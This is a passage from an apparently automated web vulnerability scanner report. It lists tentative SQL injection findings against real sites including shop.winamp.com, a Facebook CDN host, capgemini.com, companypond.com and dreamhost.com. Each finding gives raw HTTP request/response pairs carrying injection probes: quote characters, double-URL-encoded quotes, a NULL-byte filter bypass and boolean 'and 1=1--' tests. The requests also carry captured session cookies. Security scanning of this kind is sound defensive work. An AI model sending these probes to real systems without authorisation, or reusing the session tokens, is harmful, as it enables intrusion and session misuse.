Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280272038,0)
Date: Sun, 27 Feb 2011 17:46:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 25208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500%2527"-->
...[SNIP]...
<pre>java.lang.NullPointerException
   at com.digitalriver.security.SecurityModuleImpl.isPageAllowed(SecurityModuleImpl.java:762)
   at sun.reflect.GeneratedMethodAccessor290.invoke(Unknown Source)
   at sun.reflect.DelegatingMethodAccessorIm
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=67280272104,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:46:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.22. http://shop.winamp.com/store [s_pers cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_pers cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704869494,0)
Date: Sun, 27 Feb 2011 17:47:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704869912,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.23. http://shop.winamp.com/store [s_sess cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sess cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704872526,0)
Date: Sun, 27 Feb 2011 17:47:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527%2527

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704873667,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.24. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000'

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525008612,0)
Date: Sun, 27 Feb 2011 17:47:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 82107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<pre>java.lang.RuntimeException: java.lang.RuntimeException: java.lang.RuntimeException: Error serving pageContext.
   at com.digitalriver.site.taglib.StyleTag.doStartTagInternal(StyleTag.java:47)
   at com.digitalriver.taglib.TagProfil
...[SNIP]...

Request 2

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000''

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: http://shop.winamp.com:80/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage
Content-Type: text/plain
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=24330695573,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.25. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/QsQtRaU6mGT.css

Request 1

GET /rsrc.php/v1/yF/r'%20and%201%3d1--%20/QsQtRaU6mGT.css HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 7
Content-Type: text/html; charset=utf-8
X-Bad-Checksum: yF
X-Powered-By: HPHP
X-FB-Server: 10.138.64.184
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Sun, 27 Feb 2011 23:10:57 GMT
Date: Sat, 26 Feb 2011 23:10:57 GMT
Connection: close

/*bcs*/

Request 2

GET /rsrc.php/v1/yF/r'%20and%201%3d2--%20/QsQtRaU6mGT.css HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 403 Forbidden
X-Bad-Prefix: /v1/yF/r' and 1=2-- /QsQtRaU6mGT.css
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.138.17.183
Content-Length: 0
Vary: Accept-Encoding
Expires: Sat, 26 Feb 2011 23:10:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 23:10:57 GMT
Connection: close


1.26. http://www.capgemini.com/insights-and-resources/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.capgemini.com
Path:   /insights-and-resources/

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /insights-and-resources/?1%2527=1 HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/news-and-events/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __llat=aHR0cDovL3d3dy5jYXBnZW1pbmkuY29tLz9jb21wYW55PWNhcGdlbWluaSZkYXRlPU1vbiwgMjggRmViIDIwMTEgMTc6NTA6MTYgVVRDJmlwYWRkcj1Ob25lJmJyb3dzZXI9TmV0c2NhcGUlMjA1LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTI5JTIwQXBwbGVXZWJLaXQvNTM0LjEzJTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBDaHJvbWUvOS4wLjU5Ny45OCUyMFNhZmFyaS81MzQuMTMmcmVmZXJyZXI9JmNhbXBhaWduPVdlYlNpdGUgTGVhZHM=; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 504 Gateway Time-out
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:53:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 383
Connection: keep-alive

<html>
<head>
<title>The page is temporarily unavailable</title>
<style>
body { font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body bgcolor="white" text="black">
<table width="10
...[SNIP]...

Request 2

GET /insights-and-resources/?1%2527%2527=1 HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/news-and-events/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __llat=aHR0cDovL3d3dy5jYXBnZW1pbmkuY29tLz9jb21wYW55PWNhcGdlbWluaSZkYXRlPU1vbiwgMjggRmViIDIwMTEgMTc6NTA6MTYgVVRDJmlwYWRkcj1Ob25lJmJyb3dzZXI9TmV0c2NhcGUlMjA1LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTI5JTIwQXBwbGVXZWJLaXQvNTM0LjEzJTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBDaHJvbWUvOS4wLjU5Ny45OCUyMFNhZmFyaS81MzQuMTMmcmVmZXJyZXI9JmNhbXBhaWduPVdlYlNpdGUgTGVhZHM=; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:53:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=57d2060e2e51cf867b08903369d05a3c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 32547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 6]>
<html class="msie6" xmlns="http://www.w3.org/1999/xh
...[SNIP]...

1.27. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.companypond.com
Path:   /

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?1%00'=1 HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:16 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=fa03e4bec9c60463fc37a80107a29a5b; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
Marketing Company based in Morristown, NJ with offices in Miami, FL. Our primary focus is helping small to medium sized businesses achieve online marketing success. Our clients come to Optimum7 after failing to achieve their marketing objectives online and...
        <a href="/optimum7" title="Profile for optimum7">
...[SNIP]...

Request 2

GET /?1%00''=1 HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=fdc0940037a69faf36c2ec348d2ba8d4; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...

1.28. http://www.dreamhost.com/r.cgi [129733 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dreamhost.com
Path:   /r.cgi

Request 1

GET /r.cgi?129733' HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 502 Bad Gateway
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:38 GMT
Content-Type: text/html
Connection: close
Content-Length: 575

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /r.cgi?129733'' HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:39 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:20 GMT
Set-Cookie: referred=rewards%7C129733%27%27; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT
Set-Cookie: redir=12722601; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT
Location: http://www.dreamhost.com/
Content-Length: 0


1.29. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dreamhost.com
Path:   /r.cgi

Request 1

GET /r.cgi?1'=1 HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 502 Bad Gateway
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:36 GMT
Content-Type: text/html
Connection: close
Content-Length: 575

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /r.cgi?1''=1 HTTP/1.1
Host: www.dreamhost.com
Accept: */*
